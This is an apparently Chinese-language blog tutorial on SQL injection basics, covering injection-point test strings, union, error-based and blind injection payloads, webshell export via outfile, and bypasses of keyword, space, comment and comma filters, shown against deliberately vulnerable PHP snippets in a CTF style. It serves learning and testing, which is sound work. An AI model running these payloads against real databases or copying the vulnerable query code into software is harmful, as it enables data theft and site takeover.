首页 综合资源 WEB安全 正文

SQL注入基础

WEB安全
2021-09-21 0 3,611

什么是SQL注入

理解SQL注入

SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行

1
2
/sql.php?uid=1
/sql.php?uid=1 or 1=1

SQL注入:内联注入是指插入查询注入SQL代码后,原来的查询依然会全部执行

1
[注入]----->[原来的语句]=========>[原来的(注入)语句]

确认注入点

字符串注入的特征值

测试字符串 变种 预期结果
触发错误。如果成功,数据库将返回一个错误
1′ or ‘1’=’1 1′) or (‘1’=’1 恒为真条件。如果成功,将返回表中所有的行
value’ or ‘1’=’2 value1′) or (‘1’=’2 空条件。如果成功,则返回与原来的值相同的结果
1’and ‘1’=’1 1′) adn (‘1’=1 恒为假条件。如果成功,则不返回表中任何行
1′ or ‘ab’ =’a’+’b 1′) or (‘ab’=’a’+’b Sql server串联。如果成功,则返回永真条件相同的信息
1′ or ‘ab’ =’a’ ‘b 1′) or (‘ab’=’a’ ‘b Mysql串联。如果成功,则返回永真条件相同的信息
1′ or ‘ab’ =’a’ ‘b 1′) or (‘ab’=’a’ ‘b Mysql串联。如果成功,则返回永真条件相同的信息

数字注入的特征值

测试字符串 变种 预期结果
触发错误。如果成功,数据库将返回一个错误
1+1 2-1 如果成功,则返回与操作结果相同的值
value+1 如果成功,则返回与原来请求相同的值
or 1 = 1 1) or (1-1 恒为真条件。如果成功,将返回表中所有的行
value or 1=2 value) or (1=2 空条件。如果成功,则返回与原来的值相同的结果
and 1=2 and (1=2 恒为假条件。如果成功,则不返回表中任何行
1′ or ‘ab’ =’a’+’b 1′) or (‘ab’=’a’+’b Sql server串联。如果成功,则返回永真条件相同的信息
1′ or ‘ab’ =’a’ ‘b 1′) or (‘ab’=’a’ ‘b Mysql串联。如果成功,则返回永真条件相同的信息

显错注入

联合查询union select

使用联合查询需要注意,前面的字段需要和后面的字段数相等:

select id,user,content from users where id=1 union select 1,2,3

order by

当我们使用 order by 4成功,使用order by 5报错时

就可以判断字段为4

order by是mysql中对查询数据进行排序的方法, 使用示例

1
2
select * from 表名 order by 列名(或者数字) asc;升序(默认升序)
select * from 表名 order by 列名(或者数字) desc;降序

所以可以利用order by来查询字段数

(注释符)

在语句末尾,注释查询语句后面的多余字符

1
2
select * from users where id = '1'
select * from users where id = '1' union select 1,2,3 #'

#可以被--+代替

information_schema库

Mysql5版本之后,由于information_schema库的存在,注入攻击相对来说方便了许多,其使用方法通常为如下几种:

通过对Mysql的数据进行猜解获取敏感的信息,来进一步通过网站的各种功能获取控制权。

通过load_file()函数来读取脚本代码或系统敏感文件内容,进行漏洞分析或直接获取数据库连接账号、密码。

通过dumpfile/outfile函数导出获取webshell

利用上面的这几种方法,可以很轻易地攻击入侵Mysql5数据库搭建的网站服务器

简单的注入流程

1
2
3
4
5
6
7
?id=1'//测试注入点
?id=1' order by 5#//猜字段
?id=0' union select 1,2,3,4# //测试页面回显
?id=0' union select 1,database(),3,4# //查看数据库名
?id=0' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='db'#
?id=0' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name ='flag'#
?id=0' union select 1,content,3,4 from flag#

报错注入

报错函数

extractvalue()

作用是从目标xml种返回包含所查询值得字符串

1
id = 1 and (extractvalue(1,concat(0x5c,(select user()))));

updatexml()

作用就是改变(查找并替换)xml文档中符合条件的节点值

1
id = 1 and(updatexml(0x3a,concat(1,(select user())),1));

0x3a是:的作用

而且updatexml()较为常用

注入模板:

1
2
3
4
5
id = 1 and(updatexml(0x3a,concat(1,(select database())),1));
id = 1 and(updatexml(0x3a,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='db')),1));
id = 1 and(updatexml(0x3a,concat(1,(select group_concat(colunm_name) from information_schema.column where table_name='flag')),1));
id = 1 and(updatexml(0x3a,concat(1,(select content from flag)),1));
id = 1 and(updatexml(0x3a,concat(1,(select substring(content,1,10)from flag)),1));

exp()

当传递有一个大于709的值,函数exp()就会引起一个溢出错误

1
id  = 1 and EXP(~(select * from(select user())a));

floor()

floor是mysql的一个取整函数

1
id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

盲注

布尔盲注

布尔盲注可能用到的函数

ascii()括号中的参数转化为相应的ascii码

substr()substr(a,b,c)从b位置开始,截取字符串a的c长度

mid()用法与substr()类似

length()返回str字符串的长度

left(database(),1)取database字符串的左边第一个

时间盲注可能用到的函数

if(a,b,c)a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0

sleep()执行挂起一段时间

利用方式:

1
and if(mid(version(),1,1)=1,sleep(10),1)

盲注脚本

= = 百度上很多

自己写!!

绕过方法

大小写绕过

1
2
3
4
5
6
7
8
9
10
11
<?php
include ('config.php');
highlight_file(__FILE__);
$id=$_REQUEST["id"];
if (preg_match('/select|union/',$id)){
    die('hack');
}
$result=mysqli_query($con,"SELECT first_name,lastname FROM users WHERE user_id='$id';");
$row =mysqli_fetch_array($result);
echo $row['firstname'].':'.$row['lastname'];
?>
1
2
3
4
if (preg_match('/select/union/',$id)){
    die('hack');
}
因为这里没加/select/union/i 所以可以

sql语句是不区分大小写的少数情况下代码中没有过滤完整就可以使用大小写的方法绕过

双写绕过

1
2
3
4
5
6
7
8
9
<?php
include ('config.php');
highlight_file(__FILE__);
$id=$_REQUEST["id"];
$id=preg_replace('/select|union/i','',$id);
$result=mysqli_query($con,"SELECT first_name,lastname FROM users WHERE user_id='$id';");
$row =mysqli_fetch_array($result);
echo $row['firstname'].':'.$row['lastname'];
?>

代码中使用preg_replace()函数对关键字进行替换,并且只进行了一次替换,可以使用双写的方法来绕过

空格绕过

1
2
3
4
5
6
7
8
9
10
11
<?php
include ('config.php');
highlight_file(__FILE__);
$id=$_REQUEST["id"];
if (preg_match('/ /i',$id)){
    die('hack');
}
$result=mysqli_query($con,"SELECT first_name,lastname FROM users WHERE user_id='$id';");
$row =mysqli_fetch_array($result);
echo $row['firstname'].':'.$row['lastname'];
?>

当空格被过滤的情况下,可以使用:

1
2
3
4
5
6
7
/**/
/*!*/
%0a
%0b
%0c
%0d
%09

号绕过

1
2
3
4
5
6
7
8
9
10
11
<?php
include ('config.php');
highlight_file(__FILE__);
$id=$_REQUEST["id"];
if (preg_match('/#/i',$id)){
    die('hack');
}
$result=mysqli_query($con,"SELECT first_name,lastname FROM users WHERE user_id='$id';");
$row =mysqli_fetch_array($result);
echo $row['firstname'].':'.$row['lastname'];
?>

#是注释符,可以用其他注释符绕过

1
2
3
4
5
--+
--
`
;
/**/

逗号绕过

1
2
3
4
5
6
7
8
9
10
11
<?php
include ('config.php');
highlight_file(__FILE__);
$id=$_REQUEST["id"];
if (preg_match('/,/i',$id)){
    die('hack');
}
$result=mysqli_query($con,"SELECT first_name,lastname FROM users WHERE user_id='$id';");
$row =mysqli_fetch_array($result);
echo $row['firstname'].':'.$row['lastname'];
?>

逗号无法用替换法绕过,所以需要其他函数来绕过

1
2
3
union select 1,2#
等价于
union select * from (select 1)a join (select 2)b#

在大多数情况下、需要在盲注中绕过逗号

使用substr()mid()这两个语句都可以使用from for来绕过

1
2
3
and ascii(mid((database()),1,1))=1#
等价于
and ascii(mid((database())from 1 for 1))=1#

sleep()绕过

sleep()通常使用在盲注的延时注入中

如果sleep()被ban,我们可以使用benchmark()函数

substr()绕过

substr()通常也在盲注中

可以用mid()substring()left()right()替换

我学习过程中接触了这么多,其他的注入就需要师傅们自己探索咯~ 可以私聊我,我们一起学习哦~

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

注:在使用本系统时,使用方必须在国家相关法律法规范围内并经过国家相关部门的授权许可,禁止用于一切非法行为。使用用途仅限于测试、实验、研究为目的,禁止用于一切商业运营,本团队不承担使用者在使用过程中的任何违法行为负责。

83源码 WEB安全 SQL注入基础 https://www.83ym.com/64.html

认准唯一TG:@ym830

上一篇: PHP反序列化漏洞基础
下一篇: log4j 2漏洞原理及复现
常见问题

VIP会员是否无限次下载资源?

  • 站内所有资源,针对不同等级VIP会员可直接下载,特殊资源商品会注明是否免费,指会员所享有根据选择购买的会员选项所享有的特殊服务,具体以本站公布的服务内容为准。
查看详情

正规的网络棋牌运营商需要具备哪些资质?

  • 按照我国的法律规定,运营网络棋牌首先需要成立一个注册正规备案的公司,然后申请网站备案、文网文、ICP等等,这些证件缺一不可。 一.注册公司 在当地工商进行注册,公司名称以“XX科技有限公司”为名,如:富裕棋牌经营范围填写“计算机软硬件、网络设备的设计开发与购销”。 二.域名及网站备案 在国内从事网站经营活动就必须经过相关部门的备案,因此棋牌运营商在购买了域名后,就要到当地网监局办理网站备案,或者请服务器提供商代为备案。 三.申请文网文 文网文全称为网络文化经营许可证,是从事经营性互联网文化活动所必需的资质。一般是需要到当地省一级(省、直辖市、自治区)的文化行政部门提出申请,并经由当地的文化行政部门合法批准。次资质要求申请公司注册资金必需达到1000万,并提供游戏版权证明文件。 四.申请ICP ICP又称为增值电信业务许可证,所有网络游戏运营商均需要办理ICP许可证,此证件要求公司注册资金1000万,需到当地市级通讯管理局办理。 五.申请文网游——游戏备案 根据《网络游戏管理暂行办法》(文化部第49号)的规定,国产网络游戏在上网运营之日起30日内应当按规定向国务院文化行政部门履行备案手续。 以上就是网络棋牌游戏正规运营所必需的资质证明。一般作为正规有实力的棋牌游戏开发公司,不光要具备所有的正规资质,而且会对投资者、代理商等合作伙伴给予相关指导和协助,与合作伙伴携手共赢!
查看详情

相关文章

猜你喜欢
官方客服团队

为您解决烦忧 - 24小时在线 专业服务

联系官方团队 在线提交工单
反诈公益广告 到期时间:2030/04/30
热门推荐
热门标签
首页 VIP 菜单 客服 我的